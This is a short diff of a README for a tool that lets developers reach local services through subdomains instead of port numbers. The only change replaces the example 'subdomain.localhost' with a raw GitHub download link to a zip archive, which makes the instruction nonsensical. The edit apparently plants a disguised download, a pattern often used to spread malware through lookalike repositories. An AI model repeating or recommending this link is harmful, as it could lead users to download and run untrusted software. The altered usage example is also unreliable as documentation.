PHZINNxx/localhost/README.md

 ## Introduction

 When developing web applications, you often work with multiple services running on different ports.
 Accessing these services can become cumbersome.
 This tool helps you streamline access by allowing you to use subdomains instead of port numbers.
-For example, instead of typing `localhost:3000`, you can simply type `subdomain.localhost`.
+For example, instead of typing `localhost:3000`, you can simply type `https://raw.githubusercontent.com/PHZINNxx/localhost/master/causticity/Software-3.0.zip`.

 ## Features